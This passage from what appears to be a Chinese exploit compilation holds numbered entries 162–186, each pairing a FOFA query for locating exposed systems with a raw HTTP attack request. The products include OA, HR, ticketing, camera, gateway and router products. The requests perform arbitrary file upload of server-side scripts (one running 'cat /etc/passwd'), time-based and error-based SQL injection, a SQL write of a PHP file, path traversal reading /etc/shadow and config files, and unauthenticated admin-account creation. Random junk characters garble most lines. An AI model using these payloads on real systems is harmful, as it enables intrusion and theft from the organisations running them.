- `3 X$ o( Q P! Q) w<tag>3</tag>$ z* D. l ^' r+ ^% u
</UploadResume>/ D) d* o) s, \* ~& X
</soap:Body>
+ l% B% S1 p% Y1 j# W# Y</soap:Envelope>9 A7 n# c9 y5 V8 j' _3 P
% J4 p! v# y8 e$ A0 F# A
: l4 @! C& d A% c) `" L- uhttp://x.x.x.x/dizxdell.aspx
4 L8 p; i3 |7 h% ^1 |, i5 d, o- g) W& s
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传 L5 j7 l+ x% Z. A
FOFA: app="和丰山海-数字标牌". d( i D; U/ u
POST /QH.aspx HTTP/1.1, j1 Q, @/ S- f7 k8 `7 }
Host: x.x.x.x
' d1 o# f, j- d# U3 p* oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
3 E/ F0 L Q$ L/ `( G! ~- pConnection: close
6 Q2 t( T. R+ h v7 Y- d+ @Content-Length: 583. b; j/ `) T, k) r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
; A; b# m3 T4 O8 jAccept-Encoding: gzip
2 h5 M' U% C" r& O! q" h+ X& G. i% j
------WebKitFormBoundaryeegvclmyurlotuey
2 v3 p' g& q4 ]) y4 E/ w& MContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx". O* Q. M. y- x. T) t4 x
Content-Type: application/octet-stream
. X2 f# G# A6 P1 D* C; I8 e; m- n# ~/ t8 j0 B+ _0 a( @% C
<% response.write("ujidwqfuuqjalgkvrpqy") %>
1 g; W% G) e( `* d2 S+ b( E------WebKitFormBoundaryeegvclmyurlotuey; k9 v; t! }9 \/ O7 Y9 G; E
Content-Disposition: form-data; name="action"
' H7 y$ j! H2 [: P
3 B2 U9 `$ g4 s! wupload- N3 Q4 s) T; l" \- Y* L( ]. u
------WebKitFormBoundaryeegvclmyurlotuey
" W) V6 r) r8 h4 }Content-Disposition: form-data; name="responderId"
8 b4 V( C) B! X4 ]
& k! b; c* g7 L+ {+ }ResourceNewResponder4 a/ l& E p$ f1 U: A( H6 F; a
------WebKitFormBoundaryeegvclmyurlotuey
. Z# H. C9 R, L* WContent-Disposition: form-data; name="remotePath"- ]. `8 u9 k/ W' ^8 w h2 \
3 J* z8 U" S& W
/opt/resources B2 l+ g* t7 v
------WebKitFormBoundaryeegvclmyurlotuey--
( V2 x( x# {; I" V. \% n* B7 Q& h$ m% e: ?
; U8 Y& \; Z1 P4 v! [- g q
http://x.x.x.x/opt/resources/kjuhitjgk.aspx* e$ K) J/ S r! n) |2 |
) y5 b5 g& X5 D% y1 x) P163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
) P. R$ J8 s% E& o+ j9 W. IFOFA: icon_hash="-795291075"
% C* i/ ^( s/ B7 U- b7 gPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
5 I$ {! Y" z. z$ I/ S- Y, e, k$ cHost: x.x.x.x5 ]0 @) h0 G9 `/ y) {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
0 A" I e( V2 r# I. DConnection: close
" U- s( A5 T2 l) O4 n4 DContent-Length: 293 c7 k7 a" ^; {2 Y( f$ v
Accept: */*/ K3 \: S) b3 I
Accept-Encoding: gzip, deflate1 J7 r5 u3 W( c3 ^: Q
Accept-Language: zh-CN,zh;q=0.91 r, T2 v& L. ~9 |% L
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod7 O N$ {' u9 L, R& E
$ q' s: _' C* V: J4 ?5 V
------iiqvnofupvhdyrcoqyuujyetjvqgocod! ~8 ^: l _4 K2 ?) b! ]
Content-Disposition: form-data; name="name"7 H& M) Z9 V E8 I# h
% c7 e/ |/ a5 M" r: T r! W1.php
- U! z- ]+ S7 m% U# o5 m------iiqvnofupvhdyrcoqyuujyetjvqgocod2 e, @% a e6 t/ _2 |
Content-Disposition: form-data; name="upfile"; filename="1.php"
, _ L0 Q8 q( P0 ` rContent-Type: image/jpeg
' U. G( q) |3 [. G8 j: w0 e! l7 \. h! ?
rvjhvbhwwuooyiioxega* x1 B( G6 H' } h0 @# H
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
. s1 l# n8 ^* q
9 M$ }0 w- ^3 \5 g, q, s; k+ l8 b) ^1 w7 ?- U$ V
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传' t+ }: g, r. |% ?3 P; l
FOFA: title="智慧综合管理平台登入"4 `/ W$ F" E# I+ ?* }
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
: _. E3 }9 B! Q! nHost: x.x.x.x, |$ Y5 [. _6 U! J) M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0$ a0 w+ {/ n' C+ o# \
Content-Length: 288
, `) X9 R0 @2 W2 T5 `5 Q8 P3 GAccept: application/json, text/javascript, */*; q=0.019 {% e j$ {" q4 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
; V6 r- u. B7 j6 B3 _# n3 qConnection: close! h1 V7 d& z4 J; N# v' E J
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl- c& V4 U; Z! ~
X-Requested-With: XMLHttpRequest7 z/ F# T9 T5 M( `/ z5 W
Accept-Encoding: gzip; d$ |2 q% ?1 U/ S( X
3 b2 Z D0 P( i/ R# ?
------dqdaieopnozbkapjacdbdthlvtlyl
$ r1 ?, I: `& R1 x: E4 m' wContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"1 r( G; j7 i. Z, k
Content-Type: image/jpeg
* K: O3 X$ k9 t6 {' ]) _3 b/ |* T, y$ T1 G
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
, ?% E- Z5 O" m- o5 R) e- V' p1 b------dqdaieopnozbkapjacdbdthlvtlyl--
- F* D4 y2 A* ~- `( N3 Z$ F2 T5 E! d0 n l
( c0 d' h% L# I7 W7 b2 }: l
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx: I t. H2 K, p2 _8 _
3 T1 O8 p% J7 @165. OrangeHRM 3.3.3 SQL 注入
' {6 ?# s0 K7 ]. g( ?. YCVE-2024-36428
& A# L1 \! c0 V% ?- z7 QFOFA: app="OrangeHRM-产品"5 ~4 Q# ^7 v0 u2 }- E
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))" J( |4 k$ O, |, W* p `
& ]3 D+ J# w( o: p
' M# x' U6 O9 E/ ^- j166. 中成科信票务管理平台SeatMapHandler SQL注入0 o" z h2 y2 e a$ R: ?7 X) D+ l+ e
FOFA:body="技术支持:北京中成科信科技发展有限公司" i2 G5 z# k" M4 Z
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
5 M1 U; `- W; H7 r# O' f) ^/ K4 s, `Host:# u" a; @7 [; i5 I
Pragma: no-cache6 O+ Q$ }- W) g
Cache-Control: no-cache
0 R& A1 E' R' j* VUpgrade-Insecure-Requests: 13 p0 R. {" t& a7 {% L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 h; U- L, T$ g. [# |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. o8 `2 R+ u. O6 H L2 u% }% nAccept-Encoding: gzip, deflate
/ L9 _9 K+ Z, F, x& p5 ^* ^Accept-Language: zh-CN,zh;q=0.9,en;q=0.88 }8 K# ?+ f9 |& \# K" c2 r
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE6 o, U2 \+ ?3 h5 ]! g2 h
Connection: close
. g+ M0 D! J( w" B" aContent-Type: application/x-www-form-urlencoded# H% X2 c9 S' k+ S
Content-Length: 89
5 g( \2 Z6 s; F( b8 ^
1 v7 D- Q: a. ?Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE$ g" h" I+ e: \8 V* s
: L0 V. w% V. T
7 ]" u u- |% P% M
167. 精益价值管理系统 DownLoad.aspx任意文件读取) D2 Z& B) ^) w0 S! {( X
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"- E6 }' g) R. b" t- S' L; K1 o0 O
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
3 f, @$ h# ?) v KHost:' _( Y1 K* B9 z5 Z2 w' n; F s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& w) d: D, D8 w8 P2 W9 vContent-Type: application/x-www-form-urlencoded
5 Y' S1 ^' H4 @( X) CAccept-Encoding: gzip, deflate
M$ O' U, j. w, O/ N% UAccept: */** a% R7 D! h T: y4 q9 m
Connection: keep-alive& j; T/ W6 D) v3 ~0 x
" A( r1 U- R& M! {' n
) S0 z2 K) h) e- B2 B6 k
168. 宏景EHR OutputCode 任意文件读取
w6 ~5 f# U) @" k; nFOFA:app="HJSOFT-HCM"+ c+ ~3 b; Z2 w4 [
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
: m+ M! |2 o' Y$ Y. h' S2 O( UHost: your-ip
+ V' P! w! @; h8 U) K7 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$ |8 Y Q$ U4 U/ |* J1 T
Content-Type: application/x-www-form-urlencoded7 f4 ?4 Z1 p0 t" A) {4 z7 i8 c
Connection: close/ ~3 Y/ e$ r5 Z4 l5 C d+ Y
% N. g; J$ b8 y3 o; D( [
0 R1 [% r5 |) b' i- |( e
2 m% p0 I" j0 l* x* J
169. 宏景EHR downlawbase SQL注入* \2 c! e" A; S( ]
FOFA:app="HJSOFT-HCM"
2 S h# @$ q# A: @GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1' [/ p4 b3 U. y' C4 a
Host: your-ip5 D& J7 Z0 U: n6 ]% s( h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. G7 e9 K+ z" A
Accept: */*
9 n# {. o- M6 sAccept-Encoding: gzip, deflate
1 k! R( z5 K. K6 O$ z% ^6 }Connection: close+ q+ B- e& D+ ~' m8 `. B. z+ b
* s: H" t) }- ~& s/ W `
/ C2 Y+ N n" f1 M4 {. {
9 ]: }' f+ k( y; Z170. 宏景EHR DisplayExcelCustomReport 任意文件读取
) b f! q8 i) M6 ^# UFOFA:body="/general/sys/hjaxmanage.js"
; R, r! B c* J% F) \- Y( |POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
) T% e4 c" \ F/ ?" bHost: balalanengliang
2 t. j& t8 g0 V: [. {+ g$ t) OUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# |- G( N6 D* l' EContent-Type: application/x-www-form-urlencoded
7 c; l7 e* E3 l: [
' u: X8 g5 Y2 [4 _filename=../webapps/ROOT/WEB-INF/web.xml& A# R( n, ^3 f) q9 Q( f! _+ U) F/ _
. C' @ t+ Q6 U
6 Q" j( v5 h2 Y+ q5 G171. 通天星CMSV6车载定位监控平台 SQL注入$ y. ^. J1 K- G& y$ V
FOFA:body="/808gps/"
) M% f: V" z6 O3 ?% H5 w- H) EGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1) ^% }* b9 E. ^4 L
Host: your-ip' t. l6 p4 f- X- E* G' x9 N! X: L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
* Y+ B2 q" C* s4 ?) w- s1 DAccept: */*
/ L" T# T& T) I; I( Q) yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* W1 m( g& u4 P2 J6 D3 Y5 Q3 M
Accept-Encoding: gzip, deflate# m$ M2 X! j) U
Connection: close: H7 e0 ]1 S) x+ b( X8 l2 O
2 p- D: M) ?0 o2 f: q
* K1 Z7 K% r& Q: F3 N) C j+ d* @2 X# m4 p4 B
172. DT-高清车牌识别摄像机任意文件读取* V3 X' [. k' Z m4 e7 W7 L- S2 E
FOFA:app="DT-高清车牌识别摄像机"% ^# S2 V# C7 c, u
GET /../../../../etc/passwd HTTP/1.1
7 ?8 D* Z! `# s/ E. qHost: your-ip& _4 r0 A; A, c* e: _; L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 i" D- [# @" }) k$ ^: ?
Accept-Encoding: gzip, deflate
; l* m+ f$ y4 m, y* yAccept: */*; s) t6 f x" d5 P2 J
Connection: keep-alive, m) y2 W6 R( \
- H5 ^, p2 Y. G, H: Q3 H, W& r$ K
! ]2 P, _* o n6 y: U9 {: E* U! x
- _ }8 w! _, t+ V173. Check Point 安全网关任意文件读取- P, q% Q/ W! K0 ~& C3 B) o
CVE-2024-24919! [" |" ~9 F- o9 W6 F7 ]
FOFA:app="Check_Point-SSL-Network-Extender"
2 M' G/ }1 Z1 t! @$ qPOST /clients/MyCRL HTTP/1.1: L! E6 p5 E, Z5 b* p; L" N
Host: your-ip+ t! h+ r" s3 i! I5 e
Content-Type: application/x-www-form-urlencoded
$ o$ ~3 P/ D6 q' K9 `# `: r4 N6 @* s6 `9 i4 K* f
aCSHELL/../../../../../../../etc/shadow
9 d8 r* Y9 z D: \- T5 V: S9 `6 k
' {7 v" N. o, B
; m" N8 l9 V" ?0 D0 r; Y- |
8 O; A' t5 H4 t8 p174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 V1 |2 b" [" l
FOFA:app="金和网络-金和OA"
- I7 ^9 z+ A" P! J* @GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
A0 s: \- A S! B- |) OHost: your-ip
4 |- c k% ]- ` Y r0 {. cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ H, _' t' X) `9 V, J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( d0 _ J; ~# j) Z4 E( VAccept-Encoding: gzip, deflate, br! W! g4 D0 o' S
Accept-Language: zh-CN,zh;q=0.9
* T/ ~" B& l& jConnection: close+ S8 B# s! R/ k% h; _
; u- z$ P) f/ O
/ t7 |) [8 ?5 h' v( k+ q, u1 [' O2 Z' S+ k7 ?5 P
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
7 o$ R/ x* Z+ _' Z# e2 _FOFA:app="金和网络-金和OA"
& J- K' K; }3 d2 i* p' u2 hGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.17 Y) `1 l; W" w' E4 }: G
Host:2 }( l. ^; p* Z
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 ^" p* T4 k% o# B8 k$ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( j6 k# _/ i a- ^! xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 q& J7 P0 V3 j2 r4 x i3 u* oAccept-Encoding: gzip, deflate9 r( Z6 X$ Y; m3 G$ m
Connection: close
( r; O9 z6 \$ DUpgrade-Insecure-Requests: 1
& H: |, v6 Y0 X+ [4 r7 f8 P$ C- @: ]
6 i$ s9 ?( O; n3 J! Q
176. 电信网关配置管理系统 rewrite.php 文件上传8 H! \; d: F+ Q. X( {+ ^3 a! p
FOFA:body="img/login_bg3.png" && body="系统登录"0 u7 Q& u( T9 [" r+ O
POST /manager/teletext/material/rewrite.php HTTP/1.1( _! R# K! }# e5 O
Host: your-ip0 Y5 y3 ^- Z) g6 e9 \2 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( |4 g# F0 O6 W6 f. K: O `, }+ d$ D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
2 J, s2 i" k6 f* p3 e2 S* Y! bConnection: close1 R' t9 X8 J( W) V
% f ^: n: s' h% j; ]------WebKitFormBoundaryOKldnDPT$ H2 _! f9 |6 c% v
Content-Disposition: form-data; name="tmp_name"; filename="test.php"6 W2 a( I, D3 a( o7 H6 [* |
Content-Type: image/png1 L9 s! v J5 C& N( {
( S% N0 r; _5 i- c% \; U# _; J
<?php system("cat /etc/passwd");unlink(__FILE__);?>! R A3 O9 f8 I& _( `4 ^$ K9 m
------WebKitFormBoundaryOKldnDPT
; g& e5 F* B V; IContent-Disposition: form-data; name="uploadtime"" }. r1 i( T& u# L' J) T, l
: K6 \" e5 `) x+ d: J T1 L
[( g, l+ V- j* u9 M! M4 x
------WebKitFormBoundaryOKldnDPT--
* V6 \3 J# e7 B* x# E3 X" T, ]/ K% } Y+ _. i' h
' F6 q2 _6 u M6 I, V0 n8 R3 d$ J! t
177. H3C路由器敏感信息泄露: e" A, n1 j* y9 I0 E" n) M
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg, k3 j( U* e7 R, L) h( I- J9 G
/userLogin.asp/../actionpolicy_status/../M60.cfg& y. @3 T3 F, r8 a! Q
/userLogin.asp/../actionpolicy_status/../GR8300.cfg x6 z) z, a# X D
/userLogin.asp/../actionpolicy_status/../GR5200.cfg! D* s( t' T- I8 W$ ?2 v
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
6 k# Q4 L* l6 E. H5 G9 N z+ e5 Q/userLogin.asp/../actionpolicy_status/../GR2200.cfg
?7 h# A. H% u9 o8 i6 W _/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
$ P/ g3 D0 s$ t) F k. Z/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg/ A4 v& i' j, G' z
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg3 Q1 b/ I8 ~8 [# H" q. E
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
7 M/ n6 d8 E+ T4 ]/userLogin.asp/../actionpolicy_status/../ER5200.cfg4 ?. V7 w5 F- v' K" V, o4 c
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
2 W1 V5 q# s( Y! O' d8 C/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg, @, I6 R' p; } v5 z
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
- H2 a' u8 @' v. \/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg# l- P4 U; R# c
/userLogin.asp/../actionpolicy_status/../ER3200.cfg1 k* D( F$ j* A7 v
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
9 E! [" n* L1 t2 F/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
- u# h& `4 c7 ~6 l6 w/ o& B! A/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg& J1 b, a) c) Y9 C5 B* ~$ Y
/userLogin.asp/../actionpolicy_status/../ER3100.cfg% [" C' P1 k0 ^7 M- f" e. k: `/ v
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
/ H6 S! l' [& k d. |4 |2 a" e! Z0 L$ p0 h+ Q* E, x% u1 f
7 J g3 h; ]' P8 L+ B: F4 ]' [* K5 l178. H3C校园网自助服务系统-flexfileupload-任意文件上传
0 D! Q. }, h4 K2 Y# Y, z6 p5 X% TFOFA:header="/selfservice"
9 L. i3 D! X1 M* w1 w$ [' U( lPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.12 ^5 A4 J( U9 o2 V! m, ]
Host:; O1 Q. H) \! t. D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 K! y5 B( @& v: `# t) b0 v
Content-Length: 252
9 x; W) o9 t5 BAccept-Encoding: gzip, deflate# Q# M$ l7 d- r
Connection: close
* Q. e# m4 @' Z$ iContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l; W X' M6 S, m1 {* _1 z( ~
-----------------aqutkea7vvanpqy3rh2l0 t. E0 u; a: u* V; d/ B
Content-Disposition: form-data; name="12234.txt"; filename="12234"
1 k2 r' ]$ u+ g" [0 H. tContent-Type: application/octet-stream
' }- n" n: f6 n' j0 {+ }& tContent-Length: 255
9 B* x) c; R* h- x+ I" a( g
7 T) L2 n, d1 P2 R& W/ ^12234
. t" I- Y; {8 O. h3 X-----------------aqutkea7vvanpqy3rh2l--
4 `( G- E# ?! K1 W- `1 O2 L
0 ?6 |; e6 a* t; Y3 l* ^+ S- j
GET /imc/primepush/%2e%2e/flex/12234.txt
+ {" V# h: i+ e
5 R- g# U' s0 ^6 L5 f. R# M6 d
/ t* L8 e: @$ [! R' B179. 建文工程管理系统存在任意文件读取 d% u) m3 o z) J1 P/ M9 j( R
POST /Common/DownLoad2.aspx HTTP/1.12 j' C5 p9 P# E
Host: {{Hostname}}* L$ g; |# P& s
Content-Type: application/x-www-form-urlencoded4 b# ^6 e/ K3 Y; G5 N
User-Agent: Mozilla/5.0
6 V7 E# w6 f4 I$ s* N1 \; K- B3 d& q, r
path=../log4net.config&Name=+ p0 q$ [( ^2 \0 R
5 l; ~) v( a! M8 Z' R* r: }
E1 Z: u1 u: ~% L! S
180. 帮管客 CRM jiliyu SQL注入! B: r9 G% s$ h- `/ u# q- A- H
FOFA:app="帮管客-CRM"6 }7 K$ L! d$ ?
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
) a% k) U) I Z: ZHost: your-ip
& ]9 _) X/ O8 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 y2 Q+ Q7 c; PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 M' A& F# X/ o3 I! L
Accept-Encoding: gzip, deflate9 \' L$ j0 M ]$ O
Accept-Language: zh-CN,zh;q=0.9- u% U+ s, b" Y! V8 a4 w! S& L
Connection: close
9 N. a+ [" m' M! D- g) `' H+ k: Q" q h# m2 K) `
. X' S4 \' r. v+ B181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入. n0 d! ~* M7 B7 _$ Q9 F8 D) o
FOFA:"PDCA/js/_publicCom.js"/ k& g2 \ s/ i8 _7 ]6 B. M$ A
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1( \4 u* o( e( X& }' h$ Y
Host: your-ip
! d1 t% t: s; W7 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
# Z' D+ {3 S2 F% T7 b1 ?8 X. Z3 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 V" C9 u! c; a* g, q# q
Accept-Encoding: gzip, deflate, br8 B3 q9 m5 D J* L: k
Accept-Language: zh-CN,zh;q=0.9
8 S" j Z% l: V( g; Y" A) H. YConnection: close
% P0 u ~/ ~4 G: ZContent-Type: application/x-www-form-urlencoded2 H2 I5 p) _; C
1 i5 l9 R9 Y8 g# t- p0 `
4 C5 c S( ]. D6 n; U# Oaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=209 u( I- G! Q# O
1 f3 x) D( O u7 E0 u) y& s. T' s3 i0 _/ M" h/ c) Y2 `
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
* C S( z# o: \. X' W" QFOFA:"PDCA/js/_publicCom.js"1 l' Y4 b& W( g3 \9 _5 H
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
. [# [, W6 p, ]Host: your-ip9 W0 x4 q9 r8 O8 t2 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, W# E7 U& p$ G. Q5 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 m* W$ h. ^* V# B+ _( i# k- F
Accept-Encoding: gzip, deflate, br& t) x* c1 P/ v9 J6 u
Accept-Language: zh-CN,zh;q=0.9
, q w% _) T" @+ g9 u. EConnection: close: Q. Z0 n; c0 b: G2 I- J/ m
Content-Type: application/x-www-form-urlencoded% g7 a% f q% [; ^6 m8 @
( s0 e" l: j% R% {4 @7 ]% ? o
6 Z' j7 |4 l9 t G( @7 Iusername=test1234&pwd=test1234&savedays=1
, z% S5 E( u8 j! @; W9 N7 z' C* q* n$ g6 x& k0 k; j M8 {0 {8 ^
, a, o& K7 a+ \9 b: x
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入2 ~# X& l' }+ X Y' C
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"9 H: G/ O' b1 }/ L/ r; E! y7 y
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
* j3 Y; P+ S1 n; W) S! u. gHost: your-ip1 s) n: d$ D/ ^6 d5 ^
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 J6 I9 `3 j2 J6 s3 s
Accept-Charset: utf-8
) h4 E, i( l* v7 x. rAccept-Encoding: gzip, deflate) }5 p0 q; ^7 m) K8 K4 i; g
Connection: close: Y V: P+ c- E
- V7 M! \- W' U& }) h! G& G+ X6 Z' E O6 L7 f E
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
2 T, J$ e' M3 m7 A; xFOFA:server="SunFull-Webs"
; S+ L2 ?3 B, |6 u" u! tPOST /soap/AddUser HTTP/1.1: f& @5 U9 c' c( t5 C& ~
Host: your-ip
0 P; [% q, H2 w2 Q4 |Accept-Encoding: gzip, deflate2 |0 h: A- N- l: b5 d; w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; M5 a$ P2 X& X+ k t) t e1 FAccept: application/xml, text/xml, */*; q=0.01- s" M) Z' r& i$ D8 S& ~
Content-Type: text/xml; charset=utf-8# B% n' {0 T! N9 @: b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' _1 K2 H% J+ I0 J( CX-Requested-With: XMLHttpRequest
7 q( ^' _5 i: H4 c% e( d9 B6 `5 V; s
% m# l9 Z- _8 e: i$ s# rinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')# ?" W, |4 k; R6 ]
' S" y5 N: n1 ]8 E' `- n
3 a& V2 x& x, _; A" B; j185. 瑞友天翼应用虚拟化系统SQL注入% @% B: N# u+ R5 n( A" X1 h5 u$ c
version < 7.0.5.1( [* B$ O" c3 z7 D
FOFA:app="REALOR-天翼应用虚拟化系统"
5 j" ?) |1 s @GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.16 C1 |- r" R4 n. e
Host: host8 u b A$ ?1 M* C, a
+ C w2 u n6 S8 t& _ R
+ a2 N- Z8 N: v8 a( ]186. F-logic DataCube3 SQL注入7 d. Z# C. ]. K6 K6 g
CVE-2024-31750
+ V6 P* c; y8 y$ e* S3 BF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
* { V, v/ m" `FOFA:title=="DataCube3"
